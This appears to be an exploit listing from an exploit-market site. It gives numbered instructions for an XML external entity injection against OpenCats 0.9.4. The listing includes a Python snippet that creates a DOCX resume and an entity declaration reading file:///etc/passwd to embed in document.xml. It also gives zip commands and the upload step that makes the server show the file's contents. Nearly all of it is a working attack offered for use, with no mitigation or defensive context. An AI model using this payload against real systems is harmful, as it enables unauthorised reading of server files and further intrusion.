[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OpenCats 0.9.4 XML Injection Vulnerability

Author
Raed Ahsan
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-36779
Category
web applications
Date add
21-09-2021
Platform
php
#Author : Raed Ahsan
#Platform : OpenCats
#Version : 0.9.4
#LinkedIn : https://linkedin.com/in/raed-ahsan

<===============================================================================>

*INSTRUCTIONS FOR EXPLOITING THE OPENCATS 0.9.4*

<===============================================================================>

1 ) Create a file called "cv.py"
2 ) Paste the following into the cv.py file:

    from docx import Document
    document = Document()
    paragraph = document.add_paragraph("YOUR NAME")
    document.save("resume.docx")



3 ) Run the cv.py
4 ) a resume.docx file has been created.
5 ) unzip the resume.docx
6 ) cd (change directory) to word/
7 ) use your editor and open document.xml
8 ) After the first line where <?xml starts, embed the following:


    <!DOCTYPE test [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

9 ) Find where your name is written in the document.xml. The code will look something like this:


    <w:body><w:p><w:r><w:t>YOUR_NAME</w:t></w:r



10 ) remove your name and write "&test;". It will look like this:


    <w:body><w:p><w:r><w:t>&test;</w:t></w:r



11 ) Save the file and exit.
12 ) Go out of the word/ directory.
13 ) zip your resume.docx with document.xml using this command:

      zip resume.docx word/document.xml
14 ) If correctly zipped, it will respond with (deflated 65%) or 64%
15 ) upload the resume.docx onto the resume upload section of opencats.
16 ) the contents of /etc/passwd will be presented to you in the input field.

#  0day.today [2024-12-24]  #